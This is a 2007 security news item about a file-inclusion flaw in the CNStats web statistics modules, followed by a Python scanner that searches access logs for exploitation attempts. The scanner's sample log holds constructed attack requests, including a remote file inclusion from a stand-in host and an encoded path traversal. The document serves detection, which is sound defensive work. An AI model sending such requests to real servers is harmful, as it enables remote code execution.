In association with heise online

17 April 2007, 12:49

Web statistics software CNStats executes external code

Multiple bugs in CNStats, a web page access analysis application, allow attackers to execute their own PHP code on a server. This may permit access to the entire system. The who_r.php and who_s.php modules fail to filter the bj and bn parameters properly, so paths to local or external PHP scripts can be entered. This does, however, require register_globals to be turned on, which is contrary to security recommendations. The bug was found in version 2.9. The current version 2.12 is apparently also affected. The only remedy at present is to turn off register_globals.
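For administrators who want to check whether the two modules have been probed, the following is an added example (not code from CNStats or from this report) that scans web server access log lines for requests to who_r.php or who_s.php in which bj or bn carries a URL or file path. It assumes Combined Log Format, a hypothetical /cnstats/ install path, and that legitimate values of these parameters never contain path characters.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

MODULES = {"who_r.php", "who_s.php"}   # modules named in the advisory
PARAMS = {"bj", "bn"}                  # parameters named in the advisory
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so %252f is seen as '/'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return why a value looks like a file reference, or None if it does not."""
    if "://" in value:
        return "remote-url"
    # Assumption: a legitimate value never contains these path markers.
    if any(marker in value for marker in ("/", "\\", "..", "\x00")):
        return "local-path"
    return None

def scan(lines):
    """Return (line number, module, parameter, reason) for each suspicious request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        module = target.path.rsplit("/", 1)[-1].lower()
        if module not in MODULES:
            continue
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            reason = classify(fully_decode(value)) if name in PARAMS else None
            if reason:
                hits.append((number, module, name, reason))
    return hits

# Constructed sample lines (documentation addresses, hypothetical /cnstats/ path).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Apr/2007:12:00:01 +0200] "GET /cnstats/who_r.php?bj=http://host.example.invalid/a.txt HTTP/1.1" 200 512',
    '192.0.2.11 - - [17/Apr/2007:12:00:02 +0200] "GET /cnstats/who_s.php?bn=%252e%252e%252fuploads%252fnote HTTP/1.1" 200 512',
    '198.51.100.7 - - [17/Apr/2007:12:00:03 +0200] "GET /cnstats/who_r.php?bj=3 HTTP/1.1" 200 512',
    '198.51.100.8 - - [17/Apr/2007:12:00:04 +0200] "GET /index.php?bj=http://host.example.invalid/a.txt HTTP/1.1" 200 512',
]
```

With register_globals on, PHP also fills these variables from POST bodies and cookies, which access logs do not record, so an empty result does not rule out abuse.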
